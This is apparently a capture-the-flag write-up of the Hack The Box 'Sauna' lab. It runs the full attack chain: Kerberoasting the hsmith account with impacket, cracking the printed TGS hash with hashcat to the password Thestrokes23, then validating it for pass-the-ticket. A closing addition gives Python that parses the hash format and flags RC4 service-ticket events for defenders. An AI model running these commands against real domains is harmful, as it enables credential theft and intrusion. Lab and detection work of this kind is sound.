Kerberoasting


As discovered through BloodHound, the hsmith user is vulnerable to Kerberoasting.

┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ KRB5CCNAME=fsmith.ccache impacket-GetUserSPNs EGOTISTICAL-BANK.LOCAL/ -no-pass -k -request -dc-ip $IP               
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
ServicePrincipalName                      Name    MemberOf  PasswordLastSet             LastLogon  Delegation 
----------------------------------------  ------  --------  --------------------------  ---------  ----------
sauna/hsmith.egotisticalbank.local:60111  HSmith            2020-01-23 06:54:34.140321  <never>               
 
 
 
$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$1c2c92bc100e649f9546e832d418c5cc$0408fad10013c582fc443264274dc1842f37a7fa27e9af3147064177ea697bd6d416ba2cf07c6919c0ed003bfa65c09a29dfa9146b909b152e4eb9311c24f61110834327ab4b4fd2b83850e04f8e9c9ad7f130feaaa47fa7b3ce7c144bd1a75ec1325353b96ed032599f1e5455222668affb4b0d6c80f2e5a1aca2411f08d7a051ef0766d805b670a1dd3f80d745db7d6d6c35bf12674068b1ef5f7170d007a12c4696e9cf71b68c0db62a6b10d47af96228ee418bee60b3259e533b1d6cbd7f2ba27e3eac6b23b747254641f09bf9f5a7886b572151d5877142a67aef5c86b3d3d7647695a237cfb4f38a3cfad8d2542d0674e8ce6c7972f0a214d81562e577d5a972b53f36cf15aedb257abf83f2727800adcf18dca1617f7fba596a6a1e75348750aac0ed1f1f7124adc1905d9f34f59fbe76c4a73bae1cf3069da46af5133ebcf3340c790858f490b72b712337530a97c592512c4b561cc19bd4e675179e4f98aba9dfd51c6afa30b023e69c656c2dc53854efea9a71849cef1ad2d43fe9e5c963d49f0ae264e0cd921fdfcb7d5ce929a33c3213b6d4f15dcdaa818f850b5039a0db77663b17f70aebcd8cf6ab1d5bef81996b6463384806f174b72c59fe5270fc75277b557a445f6fefcd029dfc074605ea2525b453d2c11c99440a493b565a9d2e19b545328300e12ac7ca6835fef8dbdf8a40617ae1c8f44adb0672fbdc279af8b826fc41bf94a738aaf336adba046c110ae9fa0846f386ebc834d5fa17ccd24e7ef1977a0d24ca7d78f8a193b52ecdcdb8e3f9c903142f6fcc1243f2a5a35e9653be7763e93e771cff5fb82611ecb8425bec66993e802c6e65f1c4078d90866d87d33c9d06f0f7f49005c39e2473ec2b6ec82ddb6a18d1776d1ef5a9dc5eb49e39ee38c5565c6fc6a076b5e910f591e780bdb50e7379565fac12dda35eb4160bcbe6d736d51f777a1a09e2dbffc5a23972a02c4d1ee3debcb068843712bc93d3e508c192ae27bf27a12fc8b8bc520cf9a9e0c61fdf49c5d4f3746613e5dfc94aafecbd84d1521895174063bf3648a30d818a82862d2104d9126afe3d23a56a426456eb7681e22198449cf05d220c5d8098aec642e2f8c8fbe05b7805ef1be3e592d00f6f16e7ef3e75d8e72be7016556626410cddcc6a8eae961c91a035ca9ce486f63be82301f56fbd54b8cf362c993abee814b962523954ce960445e20337066d467f6fd07ced1e22dbabe50b9a55bad848162a825067fd16d78ee325b7323d276668c0ea89fd156c9d0ec5947685238519aa657fa0e434f2c4025f71b15c3bc367cb5cf3735b455c8a1c0a3697
39e7e0d3f41f23199e90591045341efb2dc87a56e359690177dd05984ec16da22ccc460eade46fa63eeb846b22c62ec550804

Using the TGT of the fsmith user, I am able to authenticate to the target KDC and Kerberoast the hsmith user, effectively extracting the TGS hash. The SPN is sauna/hsmith.egotisticalbank.local:60111.

Password Cracking


┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ hashcat -a 0 -m 13100 hsmish.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$53f66cc5f2cdd03e4ce75a3050a4ef62$...:Thestrokes23
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTI...916f02
Time.Started.....: Sat Mar 25 19:14:08 2023 (9 secs)
Time.Estimated...: Sat Mar 25 19:14:17 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1175.6 kH/s (0.47ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539264/14344385 (73.47%)
Rejected.........: 0/10539264 (0.00%)
Restore.Point....: 10538496/14344385 (73.47%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Thip1812 -> Thebasket_zaa
Hardware.Mon.#1..: Util: 67%
 
Started: Sat Mar 25 19:14:07 2023
Stopped: Sat Mar 25 19:14:18 2023

hashcat was able to crack the TGS hash. The cracked password is Thestrokes23. Surprisingly, it is the same password that was used for the fsmith user.

However, I still need to validate the credential.

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ impacket-gettgt 'egotistical-bank.local/hsmith:Thestrokes23' -dc-ip $IP 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Saving ticket in hsmith.ccache

The credential of the hsmith user has been validated against the target KDC. I also saved a TGT for the user to continue with the pass-the-ticket technique.
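Added example, not part of this writeup: a small parser for the $krb5tgs$23$ line that impacket-GetUserSPNs printed above (the layout hashcat mode 13100 consumes), plus the defender-side check over Windows event 4769 records. The 4769 records, their IP addresses and the short hash fed to the test are constructed; they mirror the fsmith-requests-hsmith's-SPN step from the page rather than being real log data.

```python
import re

# Layout of an etype-23 Kerberoast line as written by impacket-GetUserSPNs
# (hashcat mode 13100): $krb5tgs$<etype>$*<user>$<realm>$<spn>*$<checksum>$<ciphertext>
KRB5TGS_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]+)\$(?P<cipher>[0-9a-fA-F]+)$"
)

# Kerberos encryption types as they appear in TGS-REP and in event 4769 (TicketEncryptionType).
ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}


def parse_krb5tgs(line: str) -> dict:
    """Split a $krb5tgs$23$ line into its fields and report the sizes of the two hex blobs."""
    m = KRB5TGS_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5tgs$23$ line in the GetUserSPNs layout")
    etype = int(m["etype"])
    return {
        "etype": etype,
        "etype_name": ETYPE_NAMES.get(etype, "unknown"),
        "user": m["user"],
        "realm": m["realm"],
        "spn": m["spn"],
        "checksum_bytes": len(m["checksum"]) // 2,  # 16 bytes: HMAC-MD5 for RC4-HMAC
        "cipher_bytes": len(m["cipher"]) // 2,      # RC4-encrypted enc-part of the ticket
        # RC4-HMAC keys the ticket with the account's unsalted NT hash, which is why a
        # wordlist attack like the hashcat run above works; AES etypes use PBKDF2 (4096 rounds).
        "weak_etype": etype == 23,
    }


# Constructed event 4769 records ("A Kerberos service ticket was requested"); not real logs.
SAMPLE_4769 = [
    {"TargetUserName": "fsmith@EGOTISTICAL-BANK.LOCAL", "ServiceName": "hsmith",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50"},
    {"TargetUserName": "SAUNA$@EGOTISTICAL-BANK.LOCAL", "ServiceName": "SAUNA$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.10"},
    {"TargetUserName": "fsmith@EGOTISTICAL-BANK.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.50"},
]


def rc4_tgs_requests(events):
    """Flag 4769 records that match the Kerberoast pattern: an RC4 (0x17) service ticket
    for a user account's SPN (machine accounts end in '$', krbtgt is the TGT itself)."""
    hits = []
    for e in events:
        svc = e["ServiceName"]
        if e["TicketEncryptionType"].lower() == "0x17" and not svc.endswith("$") and svc.lower() != "krbtgt":
            hits.append((e["TargetUserName"], svc, e["IpAddress"]))
    return hits
```

Any hit from rc4_tgs_requests is worth a look in a domain where AES is the norm; the fix for the account is a long random password (or a gMSA) and an AES-only msDS-SupportedEncryptionTypes.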